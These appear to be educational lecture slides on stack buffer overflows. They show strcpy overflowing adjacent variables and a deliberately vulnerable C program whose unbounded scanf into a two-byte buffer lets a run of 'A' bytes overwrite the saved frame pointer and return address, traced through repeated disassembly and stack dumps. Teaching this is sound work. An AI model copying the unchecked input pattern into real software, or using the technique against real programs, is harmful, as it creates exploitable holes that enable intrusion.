Download presentation
Presentation is loading. Please wait.
1
Busted !
2
Why Security Systems Fail
4
Capability List
5
Access Control List
6
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 name[9] 0 0 … degree[4] ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘s’‘s’ ‘s’‘s’ 0 0 ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 strcpy(name,”charles”); 0 0 strcpy(degree,”PhD”); 0 0 … 0 0 printf(name); printf(degree); charles PhD
![name[9] 0 0 … degree[4] ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘s’‘s’ ‘s’‘s’ 0 0 ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 strcpy(name, charles ); 0 0 strcpy(degree, PhD ); 0 0 … 0 0 printf(name); printf(degree); charles PhD](http://images.slideplayer.com./26/8862171/slides/slide_6.jpg "name[9] 0 0 … degree[4] ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘s’‘s’ ‘s’‘s’ 0 0 ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 strcpy(name, charles ); 0 0 strcpy(degree, PhD ); 0 0 … 0 0 printf(name); printf(degree); charles PhD")
7
‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ 0 0 strcpy(name,”charleton”); ‘n’‘n’ ‘n’‘n’ … 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 name[9] 0 0 … degree[4] 0 0 ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 ‘n’‘n’ ‘n’‘n’ strcpy(degree,”PhD”); … 0 0 0 0 0 0 0 0 printf(name); printf(degree); charletonPhD PhD
![‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ 0 0 strcpy(name, charleton ); ‘n’‘n’ ‘n’‘n’ … name[9] 0 0 … degree[4] 0 0 ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 ‘n’‘n’ ‘n’‘n’ strcpy(degree, PhD ); … printf(name); printf(degree); charletonPhD PhD](http://images.slideplayer.com./26/8862171/slides/slide_7.jpg "‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ 0 0 strcpy(name, charleton ); ‘n’‘n’ ‘n’‘n’ … name[9] 0 0 … degree[4] 0 0 ‘c’‘c’ ‘c’‘c’ ‘h’‘h’ ‘h’‘h’ ‘a’‘a’ ‘a’‘a’ ‘r’‘r’ ‘r’‘r’ ‘l’‘l’ ‘l’‘l’ ‘e’‘e’ ‘e’‘e’ ‘t’‘t’ ‘t’‘t’ ‘o’‘o’ ‘o’‘o’ ‘P’‘P’ ‘P’‘P’ ‘h’‘h’ ‘h’‘h’ ‘D’‘D’ ‘D’‘D’ 0 0 ‘n’‘n’ ‘n’‘n’ strcpy(degree, PhD ); … printf(name); printf(degree); charletonPhD PhD")
9
#include void secret1(void) { puts("You found the secret function No. 1!\n"); } int main () { char string[2]; puts("Input: "); scanf("%s", string); printf("You entered %s.\n", string); return 0; }
10
At startup of poof 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e52 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
11
At startup of poof 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
12
At startup of poof 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff828 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
13
At startup of poof 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff828 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
14
At startup of poof 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e53 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
15
Before call to puts() 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e61 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
16
Just inside of puts() 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000ea4 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
17
Just after return from puts() 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e66 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
18
Just inside scanf( ) 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e66rsi 0x7fff5fbff800 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
19
After return from scanf ( ) 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e7b rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
20
Just before stack cleanup 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e95 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
21
And ready to return to the operating system? 0x0000000100000e52 : push %rbp/* entry to main() */ 0x0000000100000e53 : mov %rsp,%rbp 0x0000000100000e56 : sub $0x10,%rsp 0x0000000100000e5a : lea 0x75(%rip),%rdi 0x0000000100000e61 : callq 0x100000ea4 /* puts () */ 0x0000000100000e66 : lea -0x10(%rbp),%rsi 0x0000000100000e6a : lea 0x6d(%rip),%rdi 0x0000000100000e71 : mov $0x0,%eax 0x0000000100000e76 : callq 0x100000eaa /* scanf () */ 0x0000000100000e7b : lea -0x10(%rbp),%rsi 0x0000000100000e7f : lea 0x5b(%rip),%rdi 0x0000000100000e86 : mov $0x0,%eax 0x0000000100000e8b : callq 0x100000e9e /* printf () */ 0x0000000100000e90 : mov $0x0,%eax 0x0000000100000e95 : leaveq 0x0000000100000e96 : retq rip 0x000100000e96 rbp 0x414141414141 rsp 0x7fff5fbff818 